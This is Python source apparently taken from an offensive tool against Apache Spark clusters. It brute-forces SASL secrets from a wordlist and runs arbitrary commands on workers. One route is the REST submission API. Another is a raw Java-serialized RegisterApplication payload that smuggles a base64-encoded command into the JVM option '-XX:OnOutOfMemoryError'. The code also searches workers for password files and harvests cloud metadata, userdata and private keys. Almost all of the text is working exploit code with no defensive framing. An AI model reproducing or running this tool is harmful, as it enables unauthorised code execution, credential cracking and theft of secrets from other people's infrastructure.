def scalaCommandExec(sClient, jarURL, cmdFormatted, numWorkers): if distutils.spawn.find_executable("java") is None: whine("Could not find java binary in current PATH", "err") sys.exit(-1) deployMode, jarURI = (("client", "./res/SimpleApp.jar") if jarURL == "client" else ("cluster", jarURL)) sparkSubmit, sparkArgs = sClient.getAll(jarURI, deployMode) jarArgs = " --class SimpleApp %s %s %s" % ( jarURI, cmdFormatted.decode("utf-8"), numWorkers, ) cmdLine = "%s %s %s " % (sparkSubmit, sparkArgs, jarArgs) whine("Initializing local Spark driver...This can take a little while", "info") code, out, err = _runLocalCMD(cmdLine) if code == 0 and deployMode == "client": whine("Command output\n", "good") print(out.decode("utf-8")) elif code == 0 and deployMode != "client": whine("Application submitted in cluster mode", "good") else: whine("Error submitting JAR file or executing code", "err") print(err.decode("utf-8")) sys.exit()
def _checkPyVersion(self): if sys.version_info[0] > 2 and os.environ["PYSPARK_PYTHON"] == "python": whine( "Spark workers running a different version than Python %s.%s will throw errors. See -P option" % (sys.version_info[0], sys.version_info[1]), "warn", )
def validateYarnOptions(results): if results.yarn and results.hdfs == "None": whine( "Running in Yarn mode requires an HDFS cluster. Please add the option --hdfs ip:port", "err", ) sys.exit(-1)
def performWork(self): if not self.isReady(): whine( "Pyspark driver is not initialized. Remove conflicting options (e.g -a)", "err", ) sys.exit() self.sc.parallelize(range(0, 1), 10).filter(lambda x: x + 1).count()
def _checkListeningPorts(self): if self._is_port_in_use(self.driverPort) or self._is_port_in_use( self.blockManagerPort): whine( "Make sure that both the driver port (-D) %s and block manager port (-B) %s are free to bind" % (self.driverPort, self.blockManagerPort), "err", ) sys.exit(-1)
def listNodes(self): if not self.isReady(): whine( "Pyspark driver is not initialized. Remove conflicting options (e.g -a)", "err", ) sys.exit() self.performWork() return self.sc._jsc.sc().getExecutorMemoryStatus()
def startBruteforce(sClient, pool, wordlist): for word in open(wordlist, "r"): pool.add( pool.apply_async( isSecretSaslValid, args=(sClient, word.strip(), "sparkSaslUser", True), callback=checkResult, )) pool.join(timeout=30) pool.kill() whine("Could not find the secret", "warn")
def main(results): hostPort = results.spark_master.split(":") target = hostPort[0] port = 7077 if len(hostPort) > 1: port = int(hostPort[1]) wordlist = results.wordlist sClient = SparkClient(target, port, "0.0.0.0", "", "") pool = gevent.pool.Pool(results.threads) if not os.path.exists(wordlist): whine("Could not open wordlist file %s " % results.wordlist, "err") sys.exit(-1) whine("Starting bruteforce...", "info") startBruteforce(sClient, pool, wordlist)
def sendRestPost(self, url, jsonData, headers): try: rp = requests.post(url, timeout=3, headers=headers, json=jsonData) jsonResp = json.loads(rp.text) return jsonResp except (requests.exceptions.Timeout, requests.exceptions.RequestException): whine( "No Rest API available at %s:%s" % (self.target, self.restPort), "warn") return None except Exception as err: whine( "Error connecting to REST API at %s:%s - %s" % (self.target, self.restPort, err), "err", ) return None
def sendHTTPHello(self): try: rp = requests.get("http://%s:%s" % (self.target, self.httpPort), timeout=3) doc = html.fromstring(rp.text) return doc except (requests.exceptions.Timeout, requests.exceptions.RequestException): whine( "No Web page available at %s:%s" % (self.target, self.httpPort), "warn") return None except Exception as err: whine( "Error connecting to Web page at %s:%s - %s" % (self.target, self.httpPort, err), "err", ) return None
def sendRawMessage(self, nonce, payload, sock=None, wait_time=2): try: if sock is None: server_address = (self.target, self.port) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(3) sock.connect(server_address) sock.send(nonce) sock.send(payload) respNone = sock.recv(13) realResp = sock.recv(2048) time.sleep(wait_time) return realResp except socket.timeout: whine( "Caught a timeout on target %s:%s" % (self.target, self.port), "err") return None except Exception as serr: if serr.errno == errno.ECONNREFUSED: whine(serr, "err") sys.exit(-1) whine(serr, "warn") return None return None
def sendRestHello(self): try: rp = requests.get( "http://%s:%s/v1/submissions/status/1" % (self.target, self.restPort), timeout=3, ) jsonData = json.loads(rp.text) return jsonData except (requests.exceptions.Timeout, requests.exceptions.RequestException): whine( "No Rest API available at %s:%s" % (self.target, self.restPort), "warn") return None except Exception as err: whine( "Error connecting to REST API at %s:%s - %s" % (self.target, self.restPort, err), "err", ) return None
def initContext(self): whine("Initializing local Spark driver...This can take a little while", "info") if self.conf is None: whine("Could not load Spark conf") sys.exit(-1) if not self._check_authentication(): whine( "Spark is protected with authentication. Either provide a secret (-S) or add --blind option when executing a command to bypass authentication", "err", ) sys.exit(-1) self._checkPyVersion() self._checkListeningPorts() self.sc = pyspark.SparkContext(conf=self.conf) self.sc.setLogLevel(self.logLevel) whine("Running driver version: %s " % self.sc.version, "info")
def restCommandExec(sClient, binPath, cmdFormatted, restJarURL, maxMem): headers = {"Content-Type": "application/json;charset=UTF-8"} payload = { "action": "CreateSubmissionRequest", "appArgs": ["Test"], "clientSparkVersion": "2.4.3", "environmentVariables": { "SPARK_ENV_LOADED": "1" }, "mainClass": "Main", "sparkProperties": { "spark.driver.supervise": "false", "spark.app.name": sClient.appName, "spark.submit.deployMode": "cluster", }, } if restJarURL == "spark://%s:%s": restJarURL = "spark://%s:%s" % (sClient.target, sClient.port) payload["sparkProperties"]["spark.jars"] = restJarURL payload["sparkProperties"]["spark.driver.extraJavaOptions"] = ( "-Xmx%sm -XX:OnOutOfMemoryError=echo${IFS}%s${IFS}|base64${IFS}-d|%s" % (maxMem.zfill(2), cmdFormatted, binPath)) else: try: fqdnJar = restJarURL.split("::")[0] mainClass = restJarURL.split("::")[1] payload["sparkProperties"]["spark.jars"] = fqdnJar payload["mainClass"] = mainClass except Exception as err: whine( "Error parsing URL jar file. Please follow instructions in help page. %s" % err, "err", ) return None payload["appResource"] = payload["sparkProperties"]["spark.jars"] payload["sparkProperties"]["spark.master"] = "spark://%s:%s" % ( sClient.target, sClient.restPort, ) url = "http://%s:%s/v1/submissions/create" % (sClient.target, sClient.restPort) resp = sClient.sendRestPost(url, payload, headers) if not resp is None and resp["success"]: whine("Command successfully executed on a random worker", "good") return True else: whine("Something went wrong", "err") sys.exit(-1)
def blindCommandExec(sClient, binPath, cmdFormatted, maxMem): serialID = "\xcd\xc3\xc2\x81N\x03\xff\x02" holder = ( b"\x01\x00\x0c192.168.1.22\x00\x00E\xb1\x01\x00\x0c192.168.1.24\x00\x00\x1b\xa5\x00\x06Master\xac\xed\x00\x05sr\x00:org.apache.spark.deploy.DeployMessages$RegisterApplication\xb3\xbd\x8d\xd3\x06\t\x1f\xef\x02\x00\x02L\x00\x0eappDescriptiont\x000Lorg/apache/spark/deploy/ApplicationDescription;L\x00\x06drivert\x00%Lorg/apache/spark/rpc/RpcEndpointRef;xpsr\x00.org.apache.spark.deploy.ApplicationDescriptionZ" + serialID + "\x00\nI\x00\x13memoryPerExecutorMBL\x00\x08appUiUrlt\x00\x12Ljava/lang/String;L\x00\x07commandt\x00!Lorg/apache/spark/deploy/Command;L\x00\x10coresPerExecutort\x00\x0eLscala/Option;L\x00\reventLogCodecq\x00~\x00\x07L\x00\x0beventLogDirq\x00~\x00\x07L\x00\x14initialExecutorLimitq\x00~\x00\x07L\x00\x08maxCoresq\x00~\x00\x07L\x00\x04nameq\x00~\x00\x05L\x00\x04userq\x00~\x00\x05xp\x00\x00\x04\x00t\x00\x18http://192.168.1.22:4040sr\x00\x1forg.apache.spark.deploy.Command\x9d}\xbf\r\xfdQj\xbd\x02\x00\x06L\x00\targumentst\x00\x16Lscala/collection/Seq;L\x00\x10classPathEntriesq\x00~\x00\x0bL\x00\x0benvironmentt\x00\x16Lscala/collection/Map;L\x00\x08javaOptsq\x00~\x00\x0bL\x00\x12libraryPathEntriesq\x00~\x00\x0bL\x00\tmainClassq\x00~\x00\x05xpsr\x002scala.collection.immutable.List$SerializationProxy\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00xpt\x00\x0c--driver-urlt\x001spark://[email protected]:17841t\x00\r--executor-idt\x00\x0f{{EXECUTOR_ID}}t\x00\n--hostnamet\x00\x0c{{HOSTNAME}}t\x00\x07--corest\x00\t{{CORES}}t\x00\x08--app-idt\x00\n{{APP_ID}}t\x00\x0c--worker-urlt\x00\x0e{{WORKER_URL}}sr\x00,scala.collection.immutable.ListSerializeEnd$\x8a\\c[\xf7S\x0bm\x02\x00\x00xpxsq\x00~\x00\x0eq\x00~\x00\x1dxsr\x00 scala.collection.mutable.HashMap\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00xpw\r\x00\x00\x02\xee\x00\x00\x00\x02\x00\x00\x00\x04\x00t\x00\nSPARK_USERt\x00\x06lambdat\x00\x15SPARK_EXECUTOR_MEMORYt\x00\x051024mxsr\x00!scala.collection.mutable.ArraySeq\x15<=\xd2(I\x0es\x02\x00\x02I\x00\x06length[\x00\x05arrayt\x00\x13[Ljava/lang/Object;xp\x00\x00\x00\x03ur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\x03t\x00\x19-Dspark.driver.port=17841t\x00&-XX:OnOutOfMemoryError=/tmp/scripts.sht\x00\x07-Xmx" + maxMem.zfill(2).encode("utf-8") + b'mq\x00~\x00\x1et\x006org.apache.spark.executor.CoarseGrainedExecutorBackendsr\x00\x0bscala.None$FP$\xf6S\xca\x94\xac\x02\x00\x00xr\x00\x0cscala.Option\xfei7\xfd\xdb\x0eft\x02\x00\x00xpq\x00~\x000sr\x00\nscala.Some\x11"\xf2i^\xa1\x8bt\x02\x00\x01L\x00\x01xt\x00\x12Ljava/lang/Object;xq\x00~\x00/sr\x00\x0cjava.net.URI\xac\x01x.C\x9eI\xab\x03\x00\x01L\x00\x06stringq\x00~\x00\x05xpt\x00\x1afile:/C:/tmp/spark-events/xq\x00~\x000q\x00~\x000t\x00\x08testtestt\x00\x06lambdasr\x00.org.apache.spark.rpc.netty.NettyRpcEndpointRefV\xd5\x9fC\xdd\xe7\xe82\x03\x00\x01L\x00\x0fendpointAddresst\x00)Lorg/apache/spark/rpc/RpcEndpointAddress;xr\x00#org.apache.spark.rpc.RpcEndpointRef\xed\x8d\xff\xc5]\x08\xa0\xd2\x02\x00\x03I\x00\nmaxRetriesJ\x00\x0bretryWaitMsL\x00\x11defaultAskTimeoutt\x00!Lorg/apache/spark/rpc/RpcTimeout;xp\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x0b\xb8sr\x00\x1forg.apache.spark.rpc.RpcTimeout\xb5\x84I\xce\xfd\x9bP\x15\x02\x00\x02L\x00\x08durationt\x00*Lscala/concurrent/duration/FiniteDuration;L\x00\x0btimeoutPropq\x00~\x00\x05xpsr\x00(scala.concurrent.duration.FiniteDuration\xf2Z8LLZ\xa8j\x02\x00\x02J\x00\x06lengthL\x00\x04unitt\x00\x1fLjava/util/concurrent/TimeUnit;xr\x00"scala.concurrent.duration.Duration\x97\x9d0tfJI\xf0\x02\x00\x00xp\x00\x00\x00\x00\x00\x00\x00x~r\x00\x1djava.util.concurrent.TimeUnit\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00xr\x00\x0ejava.lang.Enum\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00xpt\x00\x07SECONDSt\x00\x14spark.rpc.askTimeoutsr\x00\'org.apache.spark.rpc.RpcEndpointAddress\xcb_\x95\xe3+}\xc3\xf8\x02\x00\x03L\x00\x04nameq\x00~\x00\x05L\x00\nrpcAddresst\x00!Lorg/apache/spark/rpc/RpcAddress;L\x00\x08toStringq\x00~\x00\x05xpt\x00\tAppClientsr\x00\x1forg.apache.spark.rpc.RpcAddress\xe5\xa2\x067\x80c\xb2\x0f\x02\x00\x02I\x00\x04portL\x00\x04hostq\x00~\x00\x05xp\x00\x00E\xb1t\x00\x0c192.168.1.22t\x00$spark://[email protected]:17841x' ) whine("Executing command on a random worker", "info") cmd = "-XX:OnOutOfMemoryError=echo\t%s\t|base64\t-d|%s" % ( cmdFormatted.decode("utf-8"), binPath, ) cmdSize = struct.pack(">H", len(cmd)) appNameSize = struct.pack(">H", len(sClient.appName)) usernameSize = struct.pack(">H", len(sClient.username)) payload = (holder[:1416] + cmdSize + cmd.encode("utf-8") + holder[1456:1728] + appNameSize + sClient.appName.encode("utf-8") + b"t" + usernameSize + sClient.username.encode("utf-8") + holder[1747:]) payloadSize = struct.pack(">I", len(payload)) payloadSize13 = struct.pack(">I", len(payload) + 13) nonce = b"\x00\x00\x00\x00" + payloadSize13 + b"\x09" + payloadSize resp = sClient.sendRawMessage(nonce, payload, wait_time=20) if not resp is None and "RegisteredApplication" in resp.decode( "utf-8", "ignore"): whine("Positive response from the Master", "good") whine( "If cmd failed, adjust the -m param to make sure to case an out of memory error", "info", ) else: whine("Something went wrong", "err")
def sendHello(self): if self.yarn: return True nonce = b"\x00\x00\x00\x00\x00\x00\x00\xc5\x03\x62\x05\x32\x92\xe7\xca\x6d\xaa\x00\x00\x00\xb0" hello = ( b"\x01\x00\x0c\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x32\x31\x00" b"\x00\xe7\x44\x01\x00\x0c\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e" b"\x32\x38\x00\x00\x1b\xa5\x00\x11\x65\x6e\x64\x70\x6f\x69\x6e\x74" b"\x2d\x76\x65\x72\x69\x66\x69\x65\x72\xac\xed\x00\x05\x73\x72\x00" b"\x3d\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x73\x70\x61\x72" b"\x6b\x2e\x72\x70\x63\x2e\x6e\x65\x74\x74\x79\x2e\x52\x70\x63\x45" b"\x6e\x64\x70\x6f\x69\x6e\x74\x56\x65\x72\x69\x66\x69\x65\x72\x24" b"\x43\x68\x65\x63\x6b\x45\x78\x69\x73\x74\x65\x6e\x63\x65\x6c\x19" b"\x1e\xae\x8e\x40\xc0\x1f\x02\x00\x01\x4c\x00\x04\x6e\x61\x6d\x65" b"\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" b"\x72\x69\x6e\x67\x3b\x78\x70\x74\x00\x06\x4d\x61\x73\x74\x65\x72" ) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (self.target, self.port) sock.settimeout(3) sock.connect(server_address) sock.send(nonce) sock.send(hello) respNone = sock.recv(21) respNone2 = sock.recv(200) if "Expected SaslMessage" in respNone2.decode("utf-8", "ignore"): self.requiresAuthentication = True if len(respNone) == 21 and respNone[10] == nonce[10]: return True except socket.timeout: whine( "Caught a timeout on target %s:%s" % (self.target, self.port), "err") sys.exit(-1) except Exception as serr: if serr.errno == errno.ECONNREFUSED: whine(serr, "err") sys.exit(-1) whine(serr, "warn") return False
def isSecretSaslValid(sClient, secret, username="******", quiet=False): sock = _setup_socket(sClient) rawServerChall = getServerChallenge(sClient, sock) if rawServerChall is None: # whine( # "Could not fetch server SASL challenge. Try reducing the number of pools", # "err", # ) return None saslNonce, realm, algorithm = extractSaslParams(rawServerChall) if algorithm != "md5-sess": # whine( # "Cannot check the secret provided. Received weird algorithm %s. Try reducing the number of pools" # % str(algorithm) # ) return None if saslNonce is None or realm is None: # whine( # "Got Null SASL Nonce (%s) or Realm (%s)" % (str(saslNonce), str(realm)), # "err", # ) return None serverResp = sendChallenge(sClient, saslNonce, realm, secret, username, sock) if serverResp is None: whine("Could not authenticate to the Spark server", "err") return None serverResp = serverResp.decode("utf-8", "ignore") if "rspauth=" in serverResp: return secret elif "SaslException" in serverResp: saslException = re.search( r"javax\.security\.sasl\.SaslException: ([\w\d -_.,]+)\n", serverResp, re.IGNORECASE, ) if not quiet: whine("Got sasl exception from server when submitting challenge", "err") if saslException: whine(saslException.group(1), "err") return False
def main(results): hostPort = results.spark_master.split(":") localIP = results.driver_ip appName = results.appName username = results.username target = hostPort[0] binPath = results.binPath restJarURL = results.restJarURL useScala = results.useScala pyBinary = results.pyBinary useRest = False useBlind = False port = 8032 if results.yarn else 7077 if len(hostPort) > 1: port = int(hostPort[1]) if results.yarn: validateYarnOptions(results) sClient = SparkClient(target, port, localIP, appName, username) sClient.restPort = results.restPort sClient.httpPort = results.httpPort sClient.blockManagerPort = results.blockManagerPort sClient.driverPort = results.driverPort if results.yarn: sClient.yarn = True sClient.hdfs = results.hdfs if not results.restJarURL is None: useRest = True if not results.cmd and not results.script: whine( "Please provide a command (-c) or script (-s) to execute via REST", "err", ) sys.exit(-1) confirmSpark(sClient) sClient.prepareConf(results.secret, results.pyBinary) if len(results.secret) > 0: validSecret = isSecretSaslValid(sClient, results.secret) if validSecret: whine("Sucessfull authentication on Spark master", "good") elif validSecret is None: whine("Could not reliably validate the secret provided", "warn") else: whine("Failed authentication using the secret provided", "err") sys.exit(-1) if results.info: checkRestPort(sClient) gotInfo = checkHTTPPort(sClient) if not gotInfo: sClient.initContext() parseListNodes(sClient) sys.exit(0) if results.blind: whine("Performing blind command execution on workers", "info") useBlind = True elif sClient.sc is None and not useRest and not useScala: sClient.initContext() print("") if results.listFiles: listCMD = 'find "$(cd ../..; pwd)" -type f -name "{0}" -printf "%M\t%u\t%g\t%6k KB\t%Tc\t%p\n" |grep -v stderr |grep -v stdout'.format( results.extension) interpreterArgs = ["/bin/bash", "-c", listCMD] parseCommandOutput(sClient, interpreterArgs, results.numWorkers) if results.passwdInFile: whine("Searching for secrets on workers", "info") scriptContent = open("./utils/searchPass.py", "r").read() interpreterArgs = [pyBinary, "-c", scriptContent, results.extension] parseCommandOutput(sClient, interpreterArgs, results.numWorkers) if results.cmd: if useBlind: blindCommandExec( sClient, binPath, base64.b64encode(results.cmd.encode("utf-8")), results.maxMem, ) elif useRest: restCommandExec( sClient, binPath, base64.b64encode(results.cmd), restJarURL, results.maxMem, ) elif useScala: hydratedCMD = "rm -f *.jar 2> /dev/null; %s" % results.cmd scalaCommandExec( sClient, results.jarURL, base64.b64encode(hydratedCMD.encode("utf-8")), results.numWorkers, ) else: interpreterArgs = [binPath, "-c", results.cmd] parseCommandOutput(sClient, interpreterArgs, results.numWorkers) if results.script: scriptContent = results.script.read().encode("utf-8") if useBlind: blindCommandExec(sClient, binPath, base64.b64encode(scriptContent), results.maxMem) elif useRest: restCommandExec( sClient, binPath, base64.b64encode(scriptContent), restJarURL, results.maxMem, ) elif useScala: hydratedCMD = b"rm *.jar 2> /dev/null;%s" % scriptContent scalaCommandExec( sClient, results.jarURL, base64.b64encode(hydratedCMD), results.numWorkers, ) else: interpreterArgs = [binPath, "-c", scriptContent] parseCommandOutput(sClient, interpreterArgs, results.numWorkers) if results.metadata: scriptContent = open("./utils/cloud.py", "r").read() interpreterArgs = [pyBinary, "-c", scriptContent, "metadata"] parseCommandOutput(sClient, interpreterArgs, results.numWorkers) if results.userdata: scriptContent = open("./utils/cloud.py", "r").read() interpreterArgs = [pyBinary, "-c", scriptContent, "userdata"] parseCommandOutput(sClient, interpreterArgs, results.numWorkers) if results.privatekey: scriptContent = open("./utils/cloud.py", "r").read() interpreterArgs = [pyBinary, "-c", scriptContent, "privatekey"] parseCommandOutput(sClient, interpreterArgs, results.numWorkers)
def checkResult(validSecret): if validSecret: whine("Sucessfull authentication on Spark master: %s " % validSecret, "good") print("--- %s seconds ---" % (time.time() - start_time)) sys.exit(0)
def parseCommandOutput(sClient, interpreterArgs, numWorkers): whine("Executing command on %d worker(s)" % numWorkers, "info") listOutput = sClient.executeCMD(interpreterArgs, numWorkers) for i, out in enumerate(listOutput): whine("Output of worker %d" % i, "good") print(out.decode("utf-8"))